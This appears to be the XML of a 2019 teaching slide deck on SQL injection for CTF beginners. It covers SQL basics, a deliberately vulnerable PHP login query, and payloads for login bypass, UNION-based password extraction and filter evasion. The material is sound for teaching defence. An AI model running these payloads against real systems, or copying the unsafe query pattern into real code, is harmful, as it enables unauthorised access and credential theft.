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943EED-8ACC-4990-80B2-8F3153C16532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CC99FF"/>
    <a:srgbClr val="302D3F"/>
    <a:srgbClr val="423D56"/>
    <a:srgbClr val="320032"/>
    <a:srgbClr val="660066"/>
    <a:srgbClr val="80008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88449" autoAdjust="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1A6-BC3E-43F3-B898-5CD3A418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A8C6-DBDF-44EB-A403-AA0F3AA3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F513-E5F2-4D0F-A706-BB19C25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964F-B550-4842-971F-5ACD382E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C08B-EB25-49D6-B7E1-B7B8E39C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0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E02-3F52-4C80-80BA-7B5DB9E9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3435-5940-4925-B593-855E60C0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C4DA-9DD8-4DA9-8A01-8AEC67A9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D277-40F9-4A21-A5E0-72EDDB11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6998-7736-4EB0-9EDE-0B1F8DE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0092-C59B-4DFD-BD83-FE9C6531B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3A55-B5F2-480B-986A-AAB898D0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AF1-905C-45BC-B9B4-FE3F21D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6C17-89FE-4DB6-907B-51A98EE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40D0-3ECF-4330-91DB-83319A3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5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4D13-D24C-4D8C-BDC1-BDD4DC3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BA43-B990-4DD7-AEF0-DFAC949A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B686-9AC3-4845-B9B4-1AA7D61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23A0-6D03-40B5-8E5E-99BD0E5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66-5CB7-4813-95ED-191CD89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0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CCB1-4DE4-4EDC-845A-F3C6010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EA14-4590-49EB-97FC-03D81147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2422-1D4E-4381-AE85-EE531CA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C73A-47F5-48FC-9588-F2D8F74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CA0-DAA8-47EB-AD2D-8875480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918-967F-4BFC-B563-B15728EA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092B-4377-46E3-860B-DC608FFF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837A-711E-4FE3-9FB3-BAC426C1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0ECA-86CF-4C37-B9B5-E1C3838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668F-FB95-41E1-A476-3D4E90D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9AC6-4AA9-4FDF-81CA-D3F3271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5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1F0-142C-4ED1-8792-D114B57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5FDA-29BC-4C06-BD1D-C0BC0CF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1CB6C-0EAA-4372-9DE2-95F2D995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0F38-51D4-496E-8734-25094D6E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AEA4E-4BCB-4742-BB85-667E2ACB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E7D5-3D9C-4007-8B56-DB1ADDD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E1F5-B20C-4DE3-81C4-FAB1F82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D022F-8429-4232-B616-E65BBFB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6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48E-8A66-4546-9D07-2788BA1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3B8A9-5368-443D-9E7D-02EAA78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D2BE-FB87-466C-95E6-EC18A1A3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D155-E017-4F34-A42D-8F35FB4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F7A7-FE22-49B9-B412-01D3B82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86E6-A1BE-43D6-BCFE-5C76501D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A22B-CEB7-4F67-9EF0-C231F0B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89E-286D-4F9D-8462-2231B0C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2106-75C3-46B0-A6F5-C5E6F269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0B9B-24F3-4879-9049-BDCF7974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9D4B-D5AF-4268-B281-C16B5F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96BC-688B-4581-8C84-9B7D5B1C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BF13-9BB6-4D9D-8341-2D9DCFC0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8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839-9FFE-45B3-8BBA-4F4F089A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D7185-EA95-477D-8DC3-9EB74A19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1C61-9190-4FE6-B311-15DDE4F3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F5E8-4882-462B-91AC-62B1E14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C00D-EB03-4C7C-8246-C99244F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6D56-28CD-4CF9-BA72-828313C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1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3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B3E5-952D-46CA-B464-9CD363E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9485-9704-4046-AE17-69DC576E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E163-D77F-44FA-87D9-144F6FE6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C039-0959-4415-8AA5-45886C5F6194}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>1/08/2019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437E-B81B-4132-B802-A9A8AB1B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F780-ED87-4E36-81E6-22BFFF87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8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8D3A4-00B1-48C5-8AFF-A7966A29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8" y="2095500"/>
            <a:ext cx="26670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781885" y="3340220"/>
            <a:ext cx="7830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SQL Injection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781885" y="2095408"/>
            <a:ext cx="7830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sample login script in PHP might look like this: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– Login Bypass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006352"/>
            <a:ext cx="11203619" cy="1988599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$res = $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-&gt;query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"SELECT username FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a: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and password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$pass</a:t>
            </a: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'"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If one or more rows returned, login success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Else login failure</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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0AE97-BC70-4D11-84E2-BBAE106B628F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382663" y="408362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$pass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supplied from an input form. Can you spot the potential danger?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$pass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 FROM users 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WHERE username='test' and password='test'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– Login Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306248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$pass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 FROM users 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WHERE username='test' and password='test'</a:t>
            </a:r>
          </a:p>
          <a:p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$pass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 or 1=1 or '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 FROM users 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WHERE username='test' and password='' or 1=1 or ''</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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– Login Bypass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929A7B2-26EB-40DF-BDEF-E30F4B0A6887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="9955683" y="3840217"/>
            <a:ext cx="284710" cy="2280935"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27739"/>
              <a:gd name="adj2" fmla="val 50779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D1972-FCB7-4969-9F24-520FE6574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7" y="5364777"/>
            <a:ext cx="467402" cy="4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It's common to use a comment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 x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end a line for SQL injection, to make things easier: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 or 1=1-- x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$pass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 FROM users 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WHERE username='' or 1=1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 x and password='x'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3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– Login Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109721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 if the SQL injection is not in the login form?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- UNION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3F3C5-55CF-4BA3-BB31-60DD2C2CDB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470517" y="2006352"/>
            <a:ext cx="11203619" cy="1988599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User lister – search for a user here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$res = $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-&gt;query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"SELECT username, admin FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a: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'"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Print out the user details if the username exists</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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8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trick: inject UNION to select other columns from the table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- UNION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EBED6-71E2-4034-8C48-75C0E87C58EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230819" y="1917679"/>
            <a:ext cx="116278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 and 1=0 union select password,0 from users-- x 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username, admin FROM users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WHERE username='' and 1=0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union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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password,0 from users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 x'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9D519C0-6426-4B8D-8BC4-BF152906F8F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4900165" y="553313"/>
            <a:ext cx="284710" cy="7137647"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27739"/>
              <a:gd name="adj2" fmla="val 50779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E905-1BC1-442B-85F5-5488614B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87" y="4488474"/>
            <a:ext cx="478148" cy="4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trick: inject UNION to select other columns from the table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- UNION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EBED6-71E2-4034-8C48-75C0E87C58EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230819" y="1917679"/>
            <a:ext cx="116278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 and 1=0 union select password,0 from users-- x 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username, admin FROM users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WHERE username='' and 1=0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union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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password,0 from users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 x'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77227-5AEB-43DB-960C-5A2B30A5CF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273337" y="2953424"/>
            <a:ext cx="1586969" cy="475576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8F738-54D5-435E-A2C6-66C64D21D422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719498" y="5532051"/>
            <a:ext cx="70964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5050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The first query will return no results because of the 1=0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91C6A-A1DB-4FDE-967F-AF13DC404354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6860306" y="3191212"/>
            <a:ext cx="1253884" cy="2333884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trick: inject UNION to select other columns from the table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Injection - UNION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EBED6-71E2-4034-8C48-75C0E87C58EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230819" y="1917679"/>
            <a:ext cx="116278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$user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 and 1=0 union select password,0 from users-- x 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username, admin FROM users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WHERE username='' and 1=0</a:t>
            </a:r>
            <a:b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union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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password,0 from users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 x'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77227-5AEB-43DB-960C-5A2B30A5CF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956265" y="2502454"/>
            <a:ext cx="3139735" cy="475576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8F738-54D5-435E-A2C6-66C64D21D422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284085" y="4947276"/>
            <a:ext cx="75879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5050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You must match the number of columns in a UNION SELECT.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91C6A-A1DB-4FDE-967F-AF13DC404354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2325950" y="2978030"/>
            <a:ext cx="1046087" cy="2002343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43693-1659-4B56-900B-0E8DEF63DD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3741200" y="3469948"/>
            <a:ext cx="2100307" cy="475576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87DE4-CC13-4457-AD14-D74B4D89AAB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592280" y="3945524"/>
            <a:ext cx="2199074" cy="1034849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1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It's not common in the wild, but sometimes in CTFs you have SQL injection with filters blocking use of certain words.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Remember for SQL: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You can use any true/false statement :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Filter Bypasses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5E2F29-7F4A-4A92-A8D9-9E96454B16B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="3429000"/>
            <a:ext cx="11203619" cy="1000957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or 1=1-- x</a:t>
            </a:r>
            <a:b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or 'e'='e'-- p</a:t>
            </a:r>
            <a:b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'or(3)&gt;(2)or'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9A642-2519-4BBD-A033-A5F50932323E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="4463950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There are multiple comment characters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23C94-3065-4610-9EC1-4370ECF4B922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="5048725"/>
            <a:ext cx="11203619" cy="1000957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or 1=1-- x</a:t>
            </a:r>
            <a:b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or 1=1/*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' or 1=1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&lt;NUL&gt;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7B87E-0535-43C2-84E9-53B88671EB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="6077268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just the tip of the filter evasion iceberg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it for yourself!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CBB15-2F61-44B5-AD77-15FFA3EF0781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="115252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 look at the challenges at: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https://tinyurl.com/yygj9b5s</a:t>
            </a:r>
            <a:b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1: Basics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2: UNION based injection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3: UNION based injection + enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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4: Unusual scenario (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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level 3 and 4 some research may be required – remember these challenges are using SQLite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400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A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MySQL (which is the most popular in the wild)!</a:t>
            </a:r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the discord if you haven't already…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https://discordapp.com/invite/sUAJ9b3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a look at the challenges at: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https://tinyurl.com/yygj9b5s</a:t>
            </a:r>
            <a:b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A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(You don't need to attempt them yet!)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While you wait…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31075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general you need to understand a technology to break it.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applies to almost all web hacking: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XSS (HTML, JS)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Code injection (PHP, Ruby, NodeJS etc.)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Unsafe deserialization (Java, .NET)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SQL Injection (SQL)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42911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general you need to understand a technology to break it.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applies to almost all web hacking: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XSS (HTML, JS)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Code injection (PHP, Ruby, NodeJS etc.)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Unsafe deserialization (Java, .NET)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SQL Injection (SQL)</a:t>
            </a:r>
            <a:b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Therefore, we'll start by learning some SQL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03070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is fundamentally about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we say have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AU" sz="3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556769"/>
            <a:ext cx="11203619" cy="3950563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rgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite&gt; SELECT username, password, admin FROM users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-A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admin       v3rySecr3t  1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bill        pass12321 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mary        elephant12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violet      r8g8b8a8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01D61-2C24-447D-B712-C167BCEF026F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6519446"/>
            <a:ext cx="11525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You should hash your passwords before storing them in a real-life scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="16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6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is fundamentally about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we say have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AU" sz="3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556769"/>
            <a:ext cx="11203619" cy="3950563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rgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite&gt; SELECT username, password, admin FROM users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-A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admin       v3rySecr3t  1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bill        pass12321 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mary        elephant12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violet      r8g8b8a8   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19C99-5371-4D28-AD55-BDE850E5CBE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470517" y="2902999"/>
            <a:ext cx="1535836" cy="1926454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5C8F-1110-48D5-B8F1-74D89E245713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517864" y="5717220"/>
            <a:ext cx="4902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5050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A column, e.g. the 'username' column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5ADE3-89B3-4626-8545-FDA8D3513318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1238435" y="4829453"/>
            <a:ext cx="0" cy="887767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3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is fundamentally about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which we say have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AU" sz="3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3200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556769"/>
            <a:ext cx="11203619" cy="3950563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rgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite&gt; SELECT username, password, admin FROM users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-A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admin       v3rySecr3t  1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bill        pass12321 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mary        elephant12  0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violet      r8g8b8a8   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19C99-5371-4D28-AD55-BDE850E5CBE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470517" y="4128117"/>
            <a:ext cx="3701988" cy="31976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5C8F-1110-48D5-B8F1-74D89E245713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517864" y="5717220"/>
            <a:ext cx="63424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5050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A row – all returned rows have the same columns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5ADE3-89B3-4626-8545-FDA8D3513318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172505" y="4287998"/>
            <a:ext cx="1522520" cy="1460130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7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we don't want all the rows, we can use the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clause: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024109"/>
            <a:ext cx="11203619" cy="4483223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err="1">
                <a:solidFill>
                  <a:srgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a: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  <a:t>&gt; SELECT username, password, admin FROM users WHERE admin=0;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bill        pass12321   0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mary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elephant12  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violet      r8g8b8a8    0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a: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  <a:t>&gt; SELECT username, password, admin FROM users WHERE username='bill';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bill        pass12321   0</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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2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also join multiple queries with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76190-0008-460C-9523-CECB841B4826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470517" y="2006352"/>
            <a:ext cx="11203619" cy="1988599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="302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err="1">
                <a:solidFill>
                  <a:srgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a: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  <a:t>&gt; SELECT username, password, admin FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mary</a:t>
            </a:r>
            <a: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>
                <a:solidFill>
                  <a:srgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...&gt; UNION SELECT username, password, admin FROM users WHERE admin=1;</a:t>
            </a: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username    password    admin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----------  ----------  ----------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admin       v3rySecr3t  1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mary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elephant12  0</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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0AE97-BC70-4D11-84E2-BBAE106B628F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382663" y="408362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all you need to know for basic SQL injection! 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DBE5-9795-4B53-A628-68D842C1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552" y="4083624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8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768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jgbstephenson@gmail.com</dc:creator>
  <cp:lastModifiedBy>Adam Kues</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-15T07:15:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-01T06:53:50Z</dcterms:modified>
</cp:coreProperties>
</file>